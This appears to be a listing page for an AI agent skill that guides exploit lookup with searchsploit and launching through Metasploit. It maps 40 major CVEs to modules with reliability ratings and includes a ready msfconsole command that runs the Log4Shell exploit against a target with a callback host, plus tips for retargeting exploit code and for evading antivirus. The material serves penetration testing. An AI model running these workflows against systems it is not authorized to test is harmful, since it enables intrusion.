Skill

exploit-db

Provides Exploit-DB references, searchsploit Bash usage patterns, EDB-to-Metasploit module mappings, PoC reliability rubrics, and CVSS tiers for pentesting and vulnerability research.

Bash

security

Popularity

Parent stars

Parent forks

Invocation

How this skill is triggered — by the user, by Claude, or both

Slash command

/threatswarm:exploit-db

User invocable

Model invocable

Inline context

Default effort

Tool Access

This skill is limited to the following tools:

BashRead

Context Preview

The summary Claude sees in its skill listing — used to decide when to auto-load this skill

```bash

SKILL.md

189 lines · ~2.3k tokens

Stats

LanguagePython

Parent stars32

Parent forks3

MaintenanceGood

Last CommitApr 29, 2026

Actions

View Source View Plugin View on GitHub View README

searchsploit Usage Patterns

# Text search in title/path
searchsploit apache 2.4

# Search by CVE
searchsploit --cve CVE-2021-41773
searchsploit --cve CVE-2021-44228

# JSON output for scripting
searchsploit apache --json | python3 -c "
import sys, json
data = json.load(sys.stdin)
for e in data.get('RESULTS_EXPLOIT', []):
    print(e['EDB-ID'], e['Title'], e['Path'])
"

# Copy exploit to working dir
searchsploit -m 50383

# Update database
searchsploit -u

# Search by nmap XML output
searchsploit --nmap nmap_output.xml

# Filter by type (webapps, local, remote, dos)
searchsploit -t "remote" apache

# Search for specific OS
searchsploit windows 10 privilege escalation

# Show only exploits (not shellcodes/papers)
searchsploit wordpress --www-exploit-db

EDB → Metasploit Module Mapping (Top 40 Vulnerabilities)

CVE / EDB-ID	Vulnerability	Metasploit Module	Reliability
CVE-2017-0144 / EDB-41891	MS17-010 EternalBlue	`exploit/windows/smb/ms17_010_eternalblue`	Weaponized
CVE-2021-44228 / EDB-50592	Log4Shell RCE	`exploit/multi/http/log4shell_header_injection`	Weaponized
CVE-2021-1675 / EDB-50265	PrintNightmare	`exploit/windows/dcerpc/cve_2021_1675_printnightmare`	Weaponized
CVE-2021-34473 / EDB-50243	ProxyShell Exchange	`exploit/windows/http/exchange_proxyshell_rce`	Weaponized
CVE-2020-1472 / EDB-49071	ZeroLogon	`auxiliary/admin/dcerpc/cve_2020_1472_zerologon`	Weaponized
CVE-2022-22965 / EDB-50798	Spring4Shell	`exploit/multi/http/spring_framework_rce_spring4shell`	Weaponized
CVE-2019-19781 / EDB-47901	Citrix ADC Path Traversal	`exploit/linux/http/citrix_dir_traversal_rce`	Weaponized
CVE-2020-5902 / EDB-48695	F5 BIG-IP RCE	`exploit/linux/http/f5_bigip_tmui_rce`	Weaponized
CVE-2021-26855 / EDB-49637	ProxyLogon Exchange	`exploit/windows/http/exchange_proxylogon_rce`	Weaponized
CVE-2022-26134 / EDB-51076	Confluence OGNL RCE	`exploit/multi/http/atlassian_confluence_namespace_ognl_injection`	Weaponized
CVE-2018-13379 / EDB-47288	FortiOS Path Traversal	`auxiliary/gather/fortios_vpn_user_cred`	Functional
CVE-2022-1388 / EDB-50919	F5 iControl Auth Bypass	`exploit/linux/http/f5_icontrol_rce`	Weaponized
CVE-2021-20038 / EDB-50882	SonicWall SMA Stack Overflow	`exploit/linux/http/sonicwall_sma_overflow`	Functional
CVE-2023-46604 / EDB-51880	Apache ActiveMQ RCE	`exploit/multi/misc/apache_activemq_rce_cve_2023_46604`	Weaponized
CVE-2021-3156 / EDB-49521	Sudo Baron Samedit	`exploit/linux/local/sudo_baron_samedit`	Weaponized
CVE-2021-4034 / EDB-50689	PwnKit polkit LPE	`exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec`	Weaponized
CVE-2022-0847 / EDB-50808	Dirty Pipe Linux LPE	`exploit/linux/local/cve_2022_0847_dirtypipe`	Weaponized
CVE-2016-5195 / EDB-40616	Dirty COW Linux LPE	`exploit/linux/local/overlayfs_priv_esc`	Weaponized
CVE-2014-6271 / EDB-34766	Shellshock Bash RCE	`exploit/multi/http/apache_mod_cgi_bash_env_exec`	Weaponized
CVE-2017-5638 / EDB-41570	Apache Struts2 RCE	`exploit/multi/http/struts2_content_type_ognl`	Weaponized
CVE-2019-0708 / EDB-47416	BlueKeep RDP RCE	`exploit/windows/rdp/cve_2019_0708_bluekeep_rce`	Functional
CVE-2020-0796 / EDB-48260	SMBGhost RCE	`exploit/windows/smb/cve_2020_0796_smbghost`	Functional
CVE-2018-7600 / EDB-44449	Drupalgeddon2 RCE	`exploit/unix/webapp/drupal_drupalgeddon2`	Weaponized
CVE-2019-0211 / EDB-46676	Apache HTTPd LPE	`exploit/multi/http/apache_mod_cgi_bash_env_exec`	Functional
CVE-2015-1701 / EDB-37367	Windows Win32k LPE	`exploit/windows/local/ms15_051_client_copy_image`	Weaponized
CVE-2020-14882 / EDB-49391	Oracle WebLogic RCE	`exploit/multi/http/oracle_weblogic_admin_handle_rce`	Weaponized
CVE-2021-22005 / EDB-50513	vCenter File Upload	`exploit/linux/http/vmware_vcenter_uploadova_rce`	Weaponized
CVE-2022-41040 / EDB-51917	ProxyNotShell Exchange	`exploit/windows/http/exchange_proxynotshell_rce`	Functional
CVE-2023-22515 / EDB-51899	Confluence Priv Esc	Manual PoC required	Functional
CVE-2024-21762 / EDB-51960	FortiOS OOB Write	Manual PoC required	Weaponized
CVE-2019-11510 / EDB-47297	Pulse Secure Arb File Read	`auxiliary/gather/pulse_secure_file_read`	Weaponized
CVE-2020-3452 / EDB-48577	Cisco ASA Path Traversal	`auxiliary/gather/cisco_asa_local_file_inclusion`	Weaponized
CVE-2021-40539 / EDB-50781	ManageEngine RCE	`exploit/multi/http/manageengine_adselfservice_plusrce`	Weaponized
CVE-2022-36537 / EDB-51327	ZK Framework RCE	Manual PoC	Functional
CVE-2023-4966 / EDB-51888	Citrix Bleed Session Leak	Manual PoC	Weaponized
CVE-2024-3400 / EDB-52023	PAN-OS GlobalProtect RCE	Manual PoC	Weaponized
CVE-2022-47966 / EDB-51518	ManageEngine SAML RCE	`exploit/linux/http/zoho_manageengine_saml_rce`	Weaponized
CVE-2023-27997 / EDB-51832	FortiGate SSL-VPN Heap BOF	Manual PoC	Weaponized
CVE-2023-20198 / EDB-51873	Cisco IOS XE Priv Esc	Manual PoC	Weaponized
CVE-2024-6387 / EDB-52098	OpenSSH regreSSHion	Manual PoC (race)	DoS-only

PoC Reliability Rubric

Level	Label	Criteria	Action
1	Weaponized	Works out-of-box against target version, produces shell/access reliably	Test directly; log as `CONFIRMED`
2	Functional	Requires minor adaptation (change URL, adjust offset)	Modify per target; log as `VERIFIED`
3	DoS-only	Crashes service but no code exec	Confirm version, log as `CONFIRMED-DOS`
4	Theoretical	Academic writeup, no working code	Write PoC from paper or skip
5	False/Invalid	Patched, misidentified, or wrong version	Log as `NOT-APPLICABLE`

Reliability Assessment Checklist:

□ Check affected version range vs target version (confirm match)
□ Read comments/issues on GitHub PoC for known problems
□ Check EDB verified badge (green checkmark = tested by staff)
□ Note compile requirements (libc version, kernel headers, etc.)
□ Test in identical OS/service version lab before live target
□ Check VT multi-scanner on compiled binary (defense evasion consideration)

CVSS 3.1 Tier Quick Reference

Score	Severity	Vector Pattern	Examples
9.0–10.0	CRITICAL	`AV:N/AC:L/PR:N/UI:N/S:C`	Pre-auth RCE, unauthenticated critical
7.0–8.9	HIGH	`AV:N/AC:L/PR:N/UI:N`	Auth bypass, post-auth RCE, LPE
4.0–6.9	MEDIUM	`AV:N/AC:L/PR:L` or `AV:L/AC:L`	Auth required, info disclosure
0.1–3.9	LOW	`AV:L/AC:H/PR:H`	Physical access, complex conditions

Common Vector Components:

AV: N(network) L(local) P(physical) A(adjacent)
AC: L(low) H(high)
PR: N(none) L(low) H(high)
UI: N(none) R(required)
S:  U(unchanged) C(changed)
C/I/A: N(none) L(low) H(high)

Pre-built CVSS Vectors by Category:

Pre-auth RCE (critical):    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  = 9.8
Auth bypass + access:       CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N  = 7.5
Post-auth RCE:              CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H  = 8.8
Local privilege escalation: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H  = 7.8
Stored XSS (admin):        CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N  = 5.4
SQLi (read-only):           CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N  = 6.5
SSRF (internal):            CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N  = 7.2
Path traversal (LFI):       CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N  = 7.5
DoS (network):              CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H  = 7.5
CSRF (state-change):        CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N  = 6.5

searchsploit + Metasploit Workflow

# 1. Find relevant exploits
searchsploit --cve CVE-2021-44228 --json | python3 -m json.tool

# 2. View exploit details before downloading
searchsploit -x exploits/java/webapps/50592.py

# 3. Mirror to current directory
searchsploit -m 50592

# 4. Find matching MSF module
msfconsole -q -x "search cve:2021-44228; exit"

# 5. Run MSF module
msfconsole -q -x "
use exploit/multi/http/log4shell_header_injection
set RHOSTS $TARGET
set RPORT $PORT
set TARGETURI /
set LHOST $LHOST
set LPORT $LPORT
run
exit
"

Common Exploit Modification Patterns

# Pattern 1: Fix URL in raw exploit
import re
code = open('exploit.py').read()
code = re.sub(r'http://[0-9.]+', f'http://{TARGET}', code)

# Pattern 2: Fix shell command in exploit
# Find LHOST/LPORT references and replace with env vars
import os
LHOST = os.environ['LHOST']
LPORT = os.environ['LPORT']

# Pattern 3: Adjust buffer offset for target binary version
# Use cyclic pattern to find EIP/RIP offset
python3 -c "from pwntools import *; print(cyclic(200))" | ./$BINARY
# Then check crash offset with: cyclic_find(b'faab')

exploit-db

Popularity

Invocation

Tool Access

Context Preview

SKILL.md

exploit-db

Popularity

Invocation

Tool Access

Context Preview

SKILL.md

searchsploit Usage Patterns

EDB → Metasploit Module Mapping (Top 40 Vulnerabilities)

PoC Reliability Rubric

CVSS 3.1 Tier Quick Reference

searchsploit + Metasploit Workflow

Common Exploit Modification Patterns

Similar Skills

searchsploit Usage Patterns

EDB → Metasploit Module Mapping (Top 40 Vulnerabilities)

PoC Reliability Rubric

CVSS 3.1 Tier Quick Reference

searchsploit + Metasploit Workflow

Common Exploit Modification Patterns

Similar Skills